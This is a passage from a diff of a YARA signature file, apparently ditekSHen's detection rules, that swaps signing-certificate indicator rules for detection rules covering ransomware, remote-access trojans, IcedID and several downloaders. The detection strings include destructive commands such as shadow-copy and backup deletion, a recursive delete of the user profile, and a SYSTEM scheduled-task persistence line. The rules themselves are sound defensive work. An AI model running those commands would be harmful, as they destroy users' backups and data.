-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Afia Wave Enterprises Oy" and pe.signatures [ i ] . serial == "69:ad:1e:8b:59:41:c9:3d:50:17:b7:c3:fd:b8:e7:b6" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_072472F2386F4608A0790Da2Be8A48F7 : FILE
+rule DITEKSHEN_MALWARE_Win_Ranzylocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RanzyLocker / REntS ransomware"
 		author = "ditekSHen"
-		id = "79f1e6da-003a-5291-a60c-7693ca2efbeb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0d74f6fd-e1d2-5939-991e-7fdd2ca3310b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7140-L7151"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5019-L5042"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "32b61f42ee9f3109c747e8a159376d03349d8a5061be0c31504e929cb3c3042e"
+		logic_hash = "15897144843acf49b81c5428fd1bb56d7a2acf16047a6e5d3ca4f2aaa8891577"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e2a79e70b7a16a6fc2af7fbdc3d2cbfd3ef66978"
-		importance = 20
+
+	strings:
+		$hr1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
+		$hr2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
+		$hr3 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
+		$hr4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
+		$hr5 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" ascii
+		$hr6 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
+		$hx1 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
+		$hx2 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
+		$hx3 = "227375626964223A22" ascii
+		$hx4 = "226E6574776F726B223A22" ascii
+		$hx5 = "726561646D652E747874" ascii
+		$hx6 = "-nolan" fullword wide
+		$o1 = { 8d 45 e9 89 9d 54 ff ff ff 88 9d 44 ff ff ff 3b }
+		$o2 = { 8b 44 24 2? 8b ?c 24 34 40 8b 54 24 38 89 44 24 }
+		$o3 = { 8b 44 24 2? 8b ?c 24 1c 89 44 24 34 8b 44 24 28 }
+		$o4 = { 8b 44 24 2? 8b ?c 24 34 05 00 00 a0 00 89 44 24 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FOXIT SOFTWARE INC." and pe.signatures [ i ] . serial == "07:24:72:f2:38:6f:46:08:a0:79:0d:a2:be:8a:48:f7" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $hx* ) or ( 2 of ( $hr* ) and 2 of ( $hx* ) ) or ( all of ( $o* ) and 2 of ( $h* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : FILE
+rule DITEKSHEN_MALWARE_Win_Wobbychipmbr : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects WobbyChipMBR / Covid-21 ransomware"
 		author = "ditekSHen"
-		id = "4e40ce70-d5d1-5719-bb43-40f860510093"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "581fbce1-128d-5323-a259-14d9bfdf09b1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7153-L7168"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5044-L5060"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2d07a2af36608d6eab6db85bcb968e486293239d0cfaeea7de2bb8223e58a29"
+		logic_hash = "168c7f610625131c9552252d2b824a90918d2961996ee0f783497dff5cf17351"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5ca53cc5c6dc47838bbba922ad217a468408a9bd"
-		hash1 = "293a83bfe2839bfa6d40fa52f5088e43b62791c08343c3f4dade4f1118000392"
-		importance = 20
+
+	strings:
+		$x1 = "You became a Victim of the Covid-21 Ransomware" ascii wide
+		$x2 = "Reinstalling Windows has been blocked" ascii wide
+		$x3 = "Enter Decryption Key:" ascii wide
+		$x4 = "encrypted with military grade encryption" ascii wide
+		$s1 = "schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR" ascii
+		$s2 = "\\EFI\\Boot\\bootx64.efi" ascii wide
+		$s3 = "DumpHex" fullword ascii
+		$s4 = "TFTP Error" fullword wide
+		$s5 = "HD(Part%d,MBRType=%02x,SigType=%02x)" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Dfa4F0Cff90319951B019A4681Ebd2A : FILE
+rule DITEKSHEN_MALWARE_Win_Snatch : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Snatch / GoRansome / MauriGo ransomware"
 		author = "ditekSHen"
-		id = "bbb0be70-de74-5da9-80d2-2ba474b7f472"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "00dce673-b909-571f-8117-c5d4ce73fb31"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7170-L7182"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5062-L5091"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d89cda38cf6149c004f7d7b307243567768cba73bd49979d7d4f92f902ef4508"
+		logic_hash = "bf8c33a7203458c80a43944c3117bb897b1702f0024271904d9be682cbd695fc"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "b85aacac6afb0bef5b6f1d744cd8c278030e6a3e"
-		hash1 = "4eca4e0d3c06e4889917a473229b368bae02f0135f0ac68e937a72fca431ac8a"
-		importance = 20
+
+	strings:
+		$s1 = "main.encryptFile" ascii
+		$s2 = "main.encryptFileExt" ascii
+		$s3 = "main.deleteShadowCopy" ascii
+		$s4 = "main.Shadow" fullword ascii
+		$s5 = "main.RecoverMe" fullword ascii
+		$s6 = "main.EncryptWithPublicKey" ascii
+		$s7 = "main.EncoderLookupDir" fullword ascii
+		$s8 = "main.ALIGNUP" fullword ascii
+		$s9 = "main.encrypt" fullword ascii
+		$s10 = "github.com/mauri870/ransomware" ascii
+		$m1 = "Dear You, ALl Your files On YOUR network computers are encrypted" ascii
+		$m2 = "You have to pay the ransom of %s USD in bitcoins to the address" ascii
+		$m3 = "REMEMBER YOU FILES ARE IN SAVE HANDS AND WILL BE RESTORED OR RECOVERED ONCE PAYMENT IS DONE" ascii
+		$m4 = ":HELP FEEED A CHILD:" ascii
+		$m5 = ">SYSTEM NETWORK ENCRYPTED<" ascii
+		$m6 = "YOUR IDENTIFICATION : %s" ascii
+		$m7 = "convince you of our honesty" ascii
+		$m8 = "use TOR browser to talk with support" ascii
+		$m9 = "encrypted and attackers are taking" ascii
+		$p1 = "/Go/src/kitty/kidrives/" ascii
+		$p2 = "/LGoGo/encoder.go" ascii nocase
+		$p3 = "/Go/src/kitty/kidata/" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "deepinstruction O" and pe.signatures [ i ] . serial == "0d:fa:4f:0c:ff:90:31:99:51:b0:19:a4:68:1e:bd:2a" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 2 of ( $m* ) or ( 1 of ( $m* ) and 1 of ( $s* ) ) or ( all of ( $p* ) and ( 1 of ( $s* ) or 1 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4D03Ae6512B85Eab4184Ca7F4Fa2E49C : FILE
+rule DITEKSHEN_MALWARE_Win_Meteorite : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Meteorite downloader"
 		author = "ditekSHen"
-		id = "a7dc0a07-f295-5aff-9df0-71f27f0fe88c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ce7a72ce-56a8-5def-a952-f0b08efe8a4a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7184-L7196"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5093-L5109"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2cbeaf65b0d3340df08baf67134a2fe0b26921f2e35ce541884209e3ecddf233"
+		logic_hash = "0ae8183d949046be4257b48571a266f2501d60dd302f511ca1a2d518884e6a7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0215ff94a5c0d97db82e11f87e0dfb4318acac38"
-		hash1 = "18bf017bdd74e8e8f5db5a4dd7ec3409021c7b0d2f125f05d728f3b740132015"
-		importance = 20
+
+	strings:
+		$x1 = "MeteoriteDownloader" fullword ascii wide
+		$x2 = "Meteorite Downloader" fullword ascii wide
+		$x3 = "Meteorite Downloader v" wide
+		$s1 = "regwrite" fullword wide
+		$s2 = "urlmon" fullword ascii
+		$s3 = "wscript.shell" fullword wide
+		$s4 = "modMain" fullword ascii
+		$s5 = "VBA6.DLL" fullword ascii
+		$s6 = "^_http" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lenovo IdeaCentre" and pe.signatures [ i ] . serial == "4d:03:ae:65:12:b8:5e:ab:41:84:ca:7f:4f:a2:e4:9c" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_333705C20B56E57F60B5Eb191Eef0D90 : FILE
+rule DITEKSHEN_MALWARE_Win_Legionlocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects LegionLocker ransomware"
 		author = "ditekSHen"
-		id = "e868c3ff-a701-59bd-9cd6-bf49305fe28a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4e5c50d0-808e-5adb-bce9-804ddf66ca61"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7198-L7209"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5111-L5129"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5ca35381842a0ea7c319d8388753347a72fc6df746064e520794aeb4b6724d0"
+		logic_hash = "2da897b5603415f14fff134b3a94d77e6963da79e117d26ba16e6b04e45f4045"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "44f0f77d8b649579fa6f88ae9fa4b4206b90b120"
-		importance = 20
+
+	strings:
+		$m1 = "+Do not run task manager, powershell, cmd etc." ascii wide
+		$m2 = "3 hours your files will be deleted." ascii wide
+		$m3 = "files have been encrypted by Legion Locker" ascii wide
+		$s1 = "passwordBytes" fullword ascii
+		$s2 = "_start_enc_" ascii
+		$s3 = "_del_desktop_" ascii
+		$s4 = "Processhacker" wide
+		$s5 = "/k color 47 && del /f /s /q %userprofile%\\" wide
+		$s6 = "Submit code" fullword wide
+		$pdb1 = "\\obj\\Debug\\LegionLocker.pdb" ascii
+		$pdb2 = "\\obj\\Release\\LegionLocker.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $m* ) or 1 of ( $pdb* ) or 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_79906Faf4Fbd75Baa10B322356A07F6D : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagentgo : FILE
 {
 	meta:
-		description = "Detects NetSupport (client) signed executables"
+		description = "Detects Go-based downloader"
 		author = "ditekSHen"
-		id = "afca727c-ff08-5e47-9ef4-4cd2af96d294"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e16ccb89-2eb6-5457-a88e-f802f3c35764"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7211-L7222"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5131-L5144"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "59862f31d0ba0cf56a93a86783ad802ea2e511845ab1d141aa224c0c61b720a7"
+		logic_hash = "b9dd2446eddff18be00feb34d8911600feb395a9ce2566786d42b48b444230d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f84ec9488bdac5f90db3c474b55e31a8f10a2026"
-		importance = 20
+
+	strings:
+		$s1 = "main.downloadFile" fullword ascii
+		$s2 = "main.fetchFiles" fullword ascii
+		$s3 = "main.createDefenderAllowanceException" fullword ascii
+		$s4 = "main.unzip" fullword ascii
+		$s5 = "HideWindow" fullword ascii
+		$s6 = "/go/src/installwrap/main.go" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NetSupport Ltd" and pe.signatures [ i ] . serial == "79:90:6f:af:4f:bd:75:ba:a1:0b:32:23:56:a0:7f:6d" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_030Ba877Daf788A0048D04A85B1F6Eca : FILE
+rule DITEKSHEN_MALWARE_Win_Blackmoon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables using BlackMoon RunTime"
 		author = "ditekSHen"
-		id = "66689847-aa67-5029-9f37-cc410a564633"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "76071d36-3d2d-589c-8c3f-0ae60e69996e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7224-L7235"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5146-L5155"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70b5b9011b53b7c9ac9dc286f3512a7a8bec5ec35ade0ee1c4bedd0a128994da"
+		logic_hash = "05bfde8ec3a469df5707c195e25995ac6af730e8a1595b1a598276c024420be2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1f10c5676a742548fb430fbc1965b20146b7325a"
-		importance = 20
+
+	strings:
+		$s1 = "blackmoon" fullword ascii
+		$s2 = "BlackMoon RunTime Error:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Skylum Software USA, Inc." and pe.signatures [ i ] . serial == "03:0b:a8:77:da:f7:88:a0:04:8d:04:a8:5b:1f:6e:ca" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fe83F58D001327Fbaafd7Bac76Ae6818 : FILE
+rule DITEKSHEN_MALWARE_Win_Iceid : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects IceID / Bokbot variants"
 		author = "ditekSHen"
-		id = "5d41be99-85de-55bc-817b-eea510aff308"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0da94737-0f82-5892-a0eb-f9f3c0a114cc"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7237-L7251"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5157-L5176"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8aac715daba042ca4a57cd65b98e6192c87a13e7e0c8ff4a3bc81c43223035ad"
+		logic_hash = "204b4c297806a36ca14bb3e659824f4eb49b18308af7090f0db1194705f1e2c9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c130dd74928da75a42e9d32a1d3f2fd860d81566"
-		importance = 20
+
+	strings:
+		$n1 = "POST" fullword wide
+		$n2 = "; _gat=" fullword wide
+		$n3 = "; _ga=" fullword wide
+		$n4 = "; _u=" fullword wide
+		$n5 = "; __io=" fullword wide
+		$n6 = "; _gid=" fullword wide
+		$n7 = "Cookie: __gads=" fullword wide
+		$s1 = "c:\\ProgramData" ascii
+		$s2 = "loader_dll_64.dll" fullword ascii
+		$s3 = "loader_dll_32.dll" fullword ascii
+		$s4 = "/?id=%0.2X%0.8X%0.8X%s" ascii
+		$s5 = "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A. Jensen FLY Fishing ApS" and ( pe.signatures [ i ] . serial == "fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" or pe.signatures [ i ] . serial == "00:fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" ) )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $n* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $n* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0788260F8541539D97F49Ddaa837B166 : FILE
+rule DITEKSHEN_MALWARE_Win_Purge : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Purge ransomware"
 		author = "ditekSHen"
-		id = "fb102e07-92fc-5ed8-a9cf-1cfd53f54281"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b3fb9f38-ce12-5e0e-8908-3379b5da3497"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7253-L7265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5178-L5201"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48985ac2c450bc4b3c5de635717dcf3a7ecf64109aa4059477ba79606f7fc2a4"
+		logic_hash = "83d13eca69bc99539e47d6d29689edf2a4fcd2260c6e909582126a490eef8115"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "569511fdc5e8dea454e97b005de1af5272d4bd32"
-		hash1 = "6ad407d5c7e4574c7452a1a27da532ee9a55bb4074e43aa677703923909169e4"
-		importance = 20
+
+	strings:
+		$n1 = "imagesave/imagesize.php" ascii
+		$n2 = "imageinfo.html" ascii
+		$n3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" ascii
+		$n4 = "Content-Type: application/x-www-form-urlencoded" ascii
+		$m1 = "YOUR_ID: %x%x" wide
+		$m2 = "Specially for your PC was generated personal" wide
+		$m3 = "which is on our Secret Server" wide
+		$m4 = "wait for a miracle and get your price" wide
+		$s1 = "%s\\SpyHunter Remove Ransomware" wide
+		$s2 = "$recycle.bin" fullword wide
+		$s3 = "TheEnd" fullword wide
+		$s4 = "%s\\HELP_DECRYPT_YOUR_FILES.TXT" fullword wide
+		$s5 = "%s.id_%x%x_email_" wide
+		$s6 = "scmd" fullword wide
+		$s7 = "process call create \"%s\"" wide
+		$s8 = "FinishEnds" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechSmith Corporation" and pe.signatures [ i ] . serial == "07:88:26:0f:85:41:53:9d:97:f4:9d:da:a8:37:b1:66" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $n* ) or 2 of ( $m* ) or ( 3 of ( $s* ) and ( 1 of ( $n* ) or 1 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ca5Acafb5Fdca6F8B5D66D1339A5D85 : FILE
+rule DITEKSHEN_MALWARE_Win_Njrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NjRAT / Bladabindi / NjRAT Golden"
 		author = "ditekSHen"
-		id = "6f0e9e3a-52fc-5ffd-90b3-743d925388df"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "078dea64-8f95-5939-a1fb-c0a888adcf0d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7267-L7279"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5203-L5220"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2612e58b4e1a6fa65b32fe855b3542882c79345e93ab134933c893e90bb1a75c"
+		logic_hash = "92d535a7c7f361b7a0901d0b99427ebc82a69577bfea73c04a7f9d51d2054b36"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "ab25053a3f739ddd4505cf5d9d33b5cc50f3ab35"
-		hash1 = "a3ab41d9642a5a5aa6aa4fc1e316970e06fa26c6c545dd8ff56f82f41465ec08"
-		importance = 20
+
+	strings:
+		$x1 = /Njrat\s\d+\.\d+\sGolden\s/ wide
+		$s1 = /\sfirewall\s(add|delete)\sallowedprogram/ wide
+		$s2 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 (63|6b) 00 20 00 70 00 69 00 6e 00 67 }
+		$s3 = "Execute ERROR" wide
+		$s4 = "Download ERROR" wide
+		$s5 = "[kl]" fullword wide
+		$s6 = "UploadValues" fullword wide
+		$s7 = "winmgmts:\\\\.\\root\\SecurityCenter2" fullword wide
+		$s8 = "HideM" fullword wide
+		$s9 = "No Antivirus" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valve" and pe.signatures [ i ] . serial == "0c:a5:ac:af:b5:fd:ca:6f:8b:5d:66:d1:33:9a:5d:85" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : FILE
+rule DITEKSHEN_MALWARE_Win_Darktrackrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects OzoneRAT / DarkTrack / DarkSky"
 		author = "ditekSHen"
-		id = "56dfc1b5-3aba-5c21-93e6-85d41a2a4415"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ef8675f8-f643-5948-a967-e4a9ce5ab89e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7281-L7293"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5222-L5245"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3436b7954e5488614f8f0998fe9eae7773d821c776436836d7b2230cd9c97f46"
+		logic_hash = "2a831c0f7707864d8c9e9fa338085a52933869d8cfbdbe0d12715da301c12646"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e94ad249747fd4b88750b2cd6d8d65ad33d3566d"
-		hash1 = "004f011b37e4446fa04b76aae537cc00f6588c0705839152ae2d8a837ef2b730"
-		importance = 20
+
+	strings:
+		$x1 = "Klog.dat" ascii
+		$x2 = "I_AM_DT" ascii
+		$x3 = " Alien" ascii
+		$x4 = "Local Victim" ascii
+		$x5 = "Dtback\\AlienEdition\\Server\\SuperObject.pas" ascii
+		$x6 = "].encryptedUsername" ascii
+		$x7 = "].encryptedPassword" ascii
+		$x8 = { 49 41 4d [6] 44 41 52 [0-2] 4b [6] 44 54 41 43 4b }
+		$s1 = "AntiVirusProduct" ascii
+		$s2 = "AntiSpywareProduct" ascii
+		$s3 = "ConnectServer" ascii
+		$s4 = "ExecQuery" ascii
+		$s5 = "\\Drivers\\Etc\\Hosts" fullword ascii
+		$s6 = "BTMemoryLoadLibary: Get DLLEntyPoint" ascii
+		$s7 = "\\\\.\\SyserDbgMsg" fullword ascii
+		$s8 = "\\\\.\\SyserBoot" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $x* ) or 6 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_035B41766660B08Aaf121536F0D83D4D : FILE
+rule DITEKSHEN_MALWARE_Win_Godzilla : FILE
 {
 	meta:
-		description = "Detects signed excutable of DiskCryptor open encryption solution that offers encryption of all disk partitions"
+		description = "Detects Godzilla loader"
 		author = "ditekSHen"
-		id = "80c803e1-16b8-583d-9d4f-3a0f693c9e24"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3384b844-6abf-5f94-a62b-7ebbdfe321bd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7295-L7306"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5247-L5265"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "924ed1d3c6a8d378471a2e5301f3a813ee8622135ce001d3061918d9454cdcc4"
+		logic_hash = "ff87fbaaf488ac69e06a03a7f8e5305ec114caa6271c25fa130033f50f0d9095"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2022d012c23840314f5eeaa298216bec06035787"
-		importance = 20
+
+	strings:
+		$x1 = "MSVBVM60.DLL" fullword ascii
